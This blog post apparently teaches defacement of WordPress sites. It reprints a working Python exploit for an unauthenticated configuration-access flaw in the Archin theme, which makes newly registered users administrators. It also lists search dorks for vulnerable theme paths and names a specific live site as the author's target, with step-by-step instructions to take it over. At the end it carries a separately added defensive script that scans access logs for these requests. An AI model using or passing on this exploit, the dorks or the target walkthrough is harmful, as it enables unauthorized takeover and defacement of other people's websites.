Friday, 17 January 2014

10.44
TeronkID - hey guys :D
Once again about defacing, hehe. This time I'm sharing a deface using Archin.

 # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
    
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

Save the file with a .py extension in the Python27 folder.
For the dork, you can use the ones listed here:

/wp-content/themes/candy/hades_framework/
/wp-content/themes/vithy/hades_framework/
/wp-content/themes/sodales/hades_framework/
/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/
/wp-content/themes/ratius/hades_framework/
/wp-content/themes/dagda/hades_framework/
/wp-content/themes/shopsum/hades_framework/

Expand on the dork to refine it :D
Here I already have my own target to run this against:

http://www.9to5fresh.com
After we append the path like this:
/wp-content/themes/yvora/hades_framework/option_panel/ajax.php
the result will look like this:
http://www.9to5fresh.com//wp-content/themes/averin/hades_framework/option_panel/ajax.php
If the page comes up blank, that means it's vulnerable ^_^
See the image below:




After that, we run it from cmd.
Type:
cd\
cd\python27
fileagan.py



Now, if it succeeded, we just register on that site :D
http://www.9to5fresh.com/wp-login.php
It will look like this:



In the registration form, fill in your username and an email address, which must be active :)
Once registration is done, just check your email and log in with the username and password from the email sent by that site :)
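For site owners checking whether they were hit by the requests described in this post, the following added example (not part of the original post or of bwall's script) scans web-server access logs for POSTs to the hades_framework option panel followed by a registration from the same client. The combined log format, the constructed sample lines and the function name `find_suspects` are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed combined log format: ip - - [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Option-panel endpoint shared by themes built on hades_framework
PANEL_RE = re.compile(
    r'/wp-content/themes/[^/]+/hades_framework/option_panel/ajax\.php', re.I)
REGISTER_RE = re.compile(r'/wp-login\.php\?(?:.*&)?action=register', re.I)

def find_suspects(lines):
    """Return {ip: {"panel_posts": [...], "registrations": [...]}} for clients
    that POSTed to the option panel. Registrations are recorded only when they
    follow a panel POST from the same IP (lines assumed chronological)."""
    hits = defaultdict(lambda: {"panel_posts": [], "registrations": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, raw_path, status = m.groups()
        path = unquote(raw_path)  # catch percent-encoded variants of the path
        if method != "POST":
            continue
        if PANEL_RE.search(path):
            hits[ip]["panel_posts"].append((ts, path, int(status)))
        elif REGISTER_RE.search(path) and ip in hits:
            hits[ip]["registrations"].append((ts, int(status)))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jan/2014:10:40:01 +0000] "POST //wp-content/themes/yvora/hades_framework/option_panel/ajax.php HTTP/1.1" 200 0',
    '203.0.113.5 - - [17/Jan/2014:10:40:02 +0000] "POST /wp-content/themes/yvora/hades_framework/option_panel/ajax.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [17/Jan/2014:10:40:30 +0000] "GET /wp-content/themes/yvora/style.css HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Jan/2014:10:40:45 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0',
    '203.0.113.5 - - [17/Jan/2014:10:41:10 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, info in find_suspects(SAMPLE_LOG).items():
        print(ip, len(info["panel_posts"]), "panel POSTs,",
              len(info["registrations"]), "registrations afterwards")
```

If any client is reported, verify the `admin_email`, `users_can_register` and `default_role` options on the site and review recently created administrator accounts.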




